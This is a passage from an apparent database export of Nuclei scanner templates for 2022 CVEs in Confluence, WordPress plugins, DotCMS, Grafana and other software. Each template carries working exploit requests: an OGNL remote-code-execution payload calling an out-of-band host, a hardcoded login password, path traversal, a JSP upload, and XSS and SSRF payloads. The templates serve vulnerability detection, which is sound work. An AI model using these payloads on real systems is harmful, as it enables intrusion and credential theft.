"39fc7ffee2d13bd7be7f238661aecf8a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084df" }, "name": "CVE-2022-25568.yaml", "content": "id: CVE-2022-25568\n\ninfo:\n 
name: MotionEye Config Info Disclosure\n author: DhiyaneshDK\n severity: high\n description: |\n MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.\n reference:\n - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/\n - https://github.com/ccrisan/motioneye/issues/2292\n - https://nvd.nist.gov/vuln/detail/cve-2022-25568\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-25568\n cwe-id: CWE-1188\n epss-score: 0.01838\n epss-percentile: 0.86962\n cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: motioneye_project\n product: motioneye\n shodan-query: html:\"MotionEye\"\n tags: cve,cve2022,motioneye,config,motioneye_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/config/list\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"upload_password\"\n - \"network_password\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c0eb31344ab3448d9fd654d7f0e2b8986db5171ee7fc2614b030cda3446cbcd70220546b8923bf2af5f8e75906a0e4b482a48b43d49e5bd90af2be8c05d0b606f05e:922c64590222798bb761d5b6d8e72950", "hash": "380d17a453407656d42beef491a7fe8c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e0" }, "name": "CVE-2022-2599.yaml", "content": "id: CVE-2022-2599\n\ninfo:\n name: WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. 
The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the targeted WordPress site, potentially leading to unauthorized access, data theft, or further attacks.\n remediation: |\n Update the WordPress Anti-Malware Security and Brute-Force Firewall plugin to version 4.21.83 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/276a7fc5-3d0d-446d-92cf-20060aecd0ef\n - https://wordpress.org/plugins/gotmls/advanced/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2599\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2599\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: anti-malware_security_and_brute-force_firewall_project\n product: anti-malware_security_and_brute-force_firewall\n framework: wordpress\n tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"</script><img src onerror=alert(document.domain)>\"\n - \"GOTMLS_mt\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100afd7ffdc412d5cbffebb6acdf1850cbcc2f20ebe9e9b5e56d2573c3e144242fb022100c25d1c6e7cdb06d86355391d4e7fe15b393dc72e717e0c1b998da4bfc729663a:922c64590222798bb761d5b6d8e72950", "hash": "737aea146c9c4fe15bfe0d42164f0c74", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e1" }, "name": "CVE-2022-26134.yaml", "content": "id: CVE-2022-26134\n\ninfo:\n name: Confluence - Remote Code Execution\n author: pdteam,jbertman\n severity: critical\n description: |\n Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability.\n reference:\n - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis\n - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/\n - https://jira.atlassian.com/browse/CONFSERVER-79016\n - http://packetstormsecurity.com/files/167431/Through-The-Wire-CVE-2022-26134-Confluence-Proof-Of-Concept.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-26134\n cwe-id: CWE-917\n epss-score: 0.97528\n epss-percentile: 0.9999\n cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: atlassian\n product: confluence_data_center\n shodan-query: http.component:\"Atlassian Confluence\"\n tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\"\n - \"{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - 'contains(to_lower(header_1), \"x-cmd-response:\")'\n\n - type: dsl\n dsl:\n - 'contains(interactsh_protocol, \"dns\")'\n - 'contains(to_lower(response_2), \"confluence\")'\n condition: and\n\n extractors:\n - type: kval\n kval:\n - \"x_cmd_response\"\n part: header\n# digest: 490a00463044022043923188d8f26d3bad64b5b6194f0d26c0205ef1d053c1e84a0b3122538323a802202d862f6fca847a1e99d6ec7e4b694f266cd8b0409ca139653667b057d5873735:922c64590222798bb761d5b6d8e72950", "hash": "d8395bef8e4dd3de52a414562d299146", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e2" }, "name": "CVE-2022-26138.yaml", "content": "id: CVE-2022-26138\n\ninfo:\n name: Atlassian Questions For Confluence - Hardcoded Credentials\n author: HTTPVoid\n severity: critical\n description: |\n Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. 
A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Confluence instance.\n remediation: |\n Update the Atlassian Questions For Confluence plugin to the latest version, which removes the hardcoded credentials.\n reference:\n - https://twitter.com/fluepke/status/1549892089181257729\n - https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html\n - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26138\n - https://jira.atlassian.com/browse/CONFSERVER-79483\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-26138\n cwe-id: CWE-798\n epss-score: 0.97262\n epss-percentile: 0.99834\n cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: questions_for_confluence\n shodan-query: http.component:\"Atlassian Confluence\"\n tags: cve2022,cve,confluence,atlassian,default-login,kev\n\nhttp:\n - raw:\n - |\n POST /dologin.action HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n os_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n\n payloads:\n os_username:\n - disabledsystemuser\n os_password:\n - disabled1system1user6708\n attack: pitchfork\n matchers:\n - type: dsl\n dsl:\n - 'location == \"/httpvoid.action\"'\n# digest: 4a0a004730450220422bbf1147e32d7098167fda41b6ebbbab0fb1a33273478a0fe42870a6364d550221009183ec3599722164f7c06a16c6983fbd3faab1b36f05b0913935b8d6339e5f9f:922c64590222798bb761d5b6d8e72950", "hash": 
"5514028dd66d46334534186a53fbb4c4", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e3" }, "name": "CVE-2022-26148.yaml", "content": "id: CVE-2022-26148\n\ninfo:\n name: Grafana & Zabbix Integration - Credentials Disclosure\n author: Geekby\n severity: critical\n description: |\n Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.\n impact: |\n An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches.\n remediation: |\n Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability.\n reference:\n - https://2k8.org/post-319.html\n - https://security.netapp.com/advisory/ntap-20220425-0005/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26148\n - https://github.com/HimmelAward/Goby_POC\n - https://github.com/Z0fhack/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-26148\n cwe-id: CWE-312\n epss-score: 0.15727\n epss-percentile: 0.95795\n cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: grafana\n product: grafana\n shodan-query: title:\"Grafana\"\n fofa-query: app=\"Grafana\"\n tags: cve,cve2022,grafana,zabbix,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login?redirect=%2F\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"zabbix\":'\n - '\"zbx\":'\n - \"alexanderzobnin-zabbix-datasource\"\n condition: or\n\n - type: regex\n part: body\n regex:\n - '\"password\":\"(.*?)\"'\n - '\"username\":\"(.*?)\"'\n condition: and\n\n - type: status\n status:\n - 200\n\n 
extractors:\n - type: regex\n group: 1\n regex:\n - '\"password\":\"(.*?)\"'\n - '\"username\":\"(.*?)\"'\n - '\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php'\n# digest: 4a0a00473045022100b6eaad94ff3878067cbf35ebf2e98041d29ea00cd548a6acc1cebf8170545ff5022011109ec67dc75367e14a57c39726ee1cd3150458963d5a36b4ea0a51e0b68769:922c64590222798bb761d5b6d8e72950", "hash": "4221a383e84e2b36b2d0047da987589c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e4" }, "name": "CVE-2022-26159.yaml", "content": "id: CVE-2022-26159\n\ninfo:\n name: Ametys CMS Information Disclosure\n author: Remi Gascou (podalirius)\n severity: medium\n description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.\n impact: |\n The vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26159\n - https://podalirius.net/en/cves/2022-26159/\n - https://issues.ametys.org/browse/CMS-10973\n - https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-26159\n cwe-id: CWE-425\n epss-score: 0.00597\n epss-percentile: 0.76107\n cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ametys\n product: ametys\n tags: cve,cve2022,plugin,ametys,cms\n\nhttp:\n - method: GET\n 
path:\n - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '<auto-completion>'\n - '<item>'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/xml'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d8276e7109d2bd69d3ea42af14353f15d96864cf72e8e0effcef94a02a2a499b022032467aecf3198c0b7e34fa5664b2c75d91a03e94423d9d3168960d7a55e2bfa7:922c64590222798bb761d5b6d8e72950", "hash": "4f9fd721efdfa628c9f1bd2444fb3440", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e5" }, "name": "CVE-2022-26233.yaml", "content": "id: CVE-2022-26233\n\ninfo:\n name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. 
Requests must begin with the \"GET /..\\..\" substring.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.\n reference:\n - https://0day.today/exploit/37579\n - http://seclists.org/fulldisclosure/2022/Apr/0\n - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26233\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-26233\n cwe-id: CWE-22\n epss-score: 0.00654\n epss-percentile: 0.77223\n cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: barco\n product: control_room_management_suite\n tags: cve,cve2022,barco,lfi,seclists,packetstorm\n\nhttp:\n - raw:\n - |+\n GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\n Host: {{Hostname}}\n\n unsafe: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4a0a00473045022100daa8547f82c8615b2d03d8541ff37de1f91c24cf042872c4954ab90b80af5a050220345d77954918025528c4ca7435b98169569b646c348d133e3290273d1c16e42d:922c64590222798bb761d5b6d8e72950", "hash": "ae3c2645f081c2c1bba1a10fa7805d71", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e6" }, "name": "CVE-2022-26263.yaml", "content": "id: CVE-2022-26263\n\ninfo:\n name: Yonyou U8 13.0 - Cross-Site Scripting\n author: edoardottt,theamanrawat\n severity: medium\n description: |\n Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. 
An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Yonyou U8 13.0 application.\n reference:\n - https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26263\n - http://yonyou.com\n - https://www.yonyou.com/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-26263\n cwe-id: CWE-79\n epss-score: 0.00147\n epss-percentile: 0.49736\n cpe: cpe:2.3:a:yonyou:u8\\+:13.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n vendor: yonyou\n product: u8\\+\n google-query: inurl:/u8sl/WebHelp\n tags: cve,cve2022,yonyou,xss\nheadless:\n - steps:\n - args:\n url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,\"%27\"><xsstag>()locxss\")#javascript:console.log(document.domain)'\n action: navigate\n\n - action: waitload\n matchers:\n - type: word\n words:\n - '<frame src=\"javascript:console.log(document.domain)\"'\n - 'webhelp4.js'\n condition: and\n# digest: 4a0a00473045022100e37ad372599828f388758737187d39f7af6d209982640bfacb36de3f07030964022067f4aade34d620cefe075b649af02f725b844531387823be6fa1576f1e9e53cf:922c64590222798bb761d5b6d8e72950", "hash": "f782c532df25c629d5bf1ed020c9d35a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e7" }, "name": "CVE-2022-2627.yaml", "content": "id: CVE-2022-2627\n\ninfo:\n name: WordPress Newspaper < 
12 - Cross-Site Scripting\n author: ramondunker,c4sper0\n severity: medium\n description: |\n WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The theme does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 12\n reference:\n - https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2627\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2627\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45193\n cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: tagdiv\n product: newspaper\n framework: wordpress\n publicwww-query: \"/wp-content/themes/Newspaper\"\n tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=\n\n payloads:\n xss_payload:\n - \"--><form><math><img+onerror=alert(document.domain)+src=1><mtext></form>\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - <form><math><img onerror=alert(document.domain) src=1><mtext>\n - td-block-\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
490a004630440220089ea67dd284fdc9cb5f8561b1d4bfc2fa8b0ba255e1fe4da91db549c933880402206b98099cbbb46f8c4ce87cdf7839a7b3cbd0a01ebb6f36669538d9351f172edd:922c64590222798bb761d5b6d8e72950", "hash": "acb70a8dd7caef2324aad2698fc8ac67", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e8" }, "name": "CVE-2022-2633.yaml", "content": "id: CVE-2022-2633\n\ninfo:\n name: All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery\n author: theamanrawat\n severity: high\n description: |\n WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.\n impact: |\n An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access, data leakage, or further attacks.\n remediation: |\n Update to the latest version of the All-In-One Video Gallery plugin (2.6.0) or apply the vendor-provided patch to fix the SSRF vulnerability.\n reference:\n - https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994\n - https://blog.amanrawat.in/2022/09/28/CVE-2022-2633.html\n - https://wordpress.org/plugins/all-in-one-video-gallery/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2633\n - https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/video.php#L227\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N\n cvss-score: 8.2\n cve-id: CVE-2022-2633\n cwe-id: CWE-610\n epss-score: 0.07008\n epss-percentile: 0.93291\n cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: plugins360\n product: all-in-one_video_gallery\n framework: wordpress\n tags: 
cve2022,cve,wp-plugin,unauth,ssrf,wpscan,wordpress,wp,all-in-one-video-gallery,plugins360\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n GET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Interactsh Server'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fcebc0ac370343abe355e7614907c5509aac8829c54ec69fbb1cd431e47446360220544f9db0b51c5835c7d02a72638915b7193db115f552f9def24248d6cedf3831:922c64590222798bb761d5b6d8e72950", "hash": "697ffae318b1f1b527e142acf5ca7454", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e9" }, "name": "CVE-2022-26352.yaml", "content": "id: CVE-2022-26352\n\ninfo:\n name: DotCMS - Arbitrary File Upload\n author: h1ei1\n severity: critical\n description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix this vulnerability.\n reference:\n - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/\n - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352\n - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html\n - https://groups.google.com/g/dotcms\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-26352\n cwe-id: CWE-22\n epss-score: 0.97527\n epss-percentile: 0.99989\n cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: dotcms\n product: dotcms\n tags: 
cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive\n\nhttp:\n - raw:\n - |\n POST /api/content/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n --------------------------aadc326f7ae3eac3\n Content-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\n Content-Type: text/plain\n\n <%\n out.println(\"CVE-2022-26352\");\n %>\n --------------------------aadc326f7ae3eac3--\n - |\n GET /{{randstr}}.jsp HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"CVE-2022-26352\")'\n - 'status_code_2 == 200'\n condition: and\n# digest: 4a0a004730450221009c0b8e26c1757e843516d1eb93bbf57c5a4c28cc367a24ab2913efc1c620261f02203b7f5ecae948b47821751b0eb7531ddf83eceedbcf0ad01c51e5710a9da998bb:922c64590222798bb761d5b6d8e72950", "hash": "6b6811d9c15ff4e29ba1a5a5f6e076a7", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ea" }, "name": "CVE-2022-26564.yaml", "content": "id: CVE-2022-26564\n\ninfo:\n name: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting\n author: alexrydzak\n severity: medium\n description: |\n HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://rydzak.me/2022/04/cve-2022-26564/\n - https://www.hoteldruid.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26564\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: 
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-26564\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.39401\n cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: digitaldruid\n product: hoteldruid\n shodan-query: http.favicon.hash:-1521640213\n tags: cve,cve2022,hoteldruid,xss,digitaldruid\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>'\n - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1'\n - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"<script>javascript:alert('XSS')</script>\"\n - \"HotelDruid\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cce687826fa0938f4944c77a726102f036638a7225beea50d91d7f4aba881ee4022100d38d31a915a08dd7ac2ccff9c5cdb5683ccf782cc375359389be457f415998d9:922c64590222798bb761d5b6d8e72950", "hash": "bd36ceb052ef50a9bff40ae6ecef6d86", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084eb" }, "name": "CVE-2022-26833.yaml", "content": "id: CVE-2022-26833\n\ninfo:\n name: Open Automation Software OAS Platform V16.00.0121 - Missing Authentication\n author: true13\n severity: critical\n description: |\n An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. 
An attacker can send a series of HTTP requests to trigger this vulnerability.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the affected system.\n remediation: |\n Apply the latest security patch or update to the Open Automation Software OAS Platform V16.00.0121 to fix the missing authentication issue.\n reference:\n - https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1513\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26833\n - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1513\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H\n cvss-score: 9.4\n cve-id: CVE-2022-26833\n cwe-id: CWE-306\n epss-score: 0.0166\n epss-percentile: 0.87336\n cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: openautomationsoftware\n product: oas_platform\n tags: cve2022,cve,oas,oss,unauth,openautomationsoftware\n\nhttp:\n - raw:\n - |\n POST /OASREST/v2/authenticate HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: */*\n Connection: keep-alive\n Content-Type: application/json\n\n {\"username\": \"\", \"password\": \"\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"status\":'\n - '\"data\":'\n - '\"token\":'\n - '\"clientid\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008b2b1617febe8dccc10821928bbfc6ef217f8c13d190a4e1331680c32dce97eb02206ef9889f401735822755bfeff09044d1c95a75aaa4f9225590a5d412ec8ef929:922c64590222798bb761d5b6d8e72950", "hash": "0b0e6f0e64edeaddb3db79e89992eed5", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ec" }, "name": "CVE-2022-26960.yaml", "content": "id: CVE-2022-26960\n\ninfo:\n name: elFinder 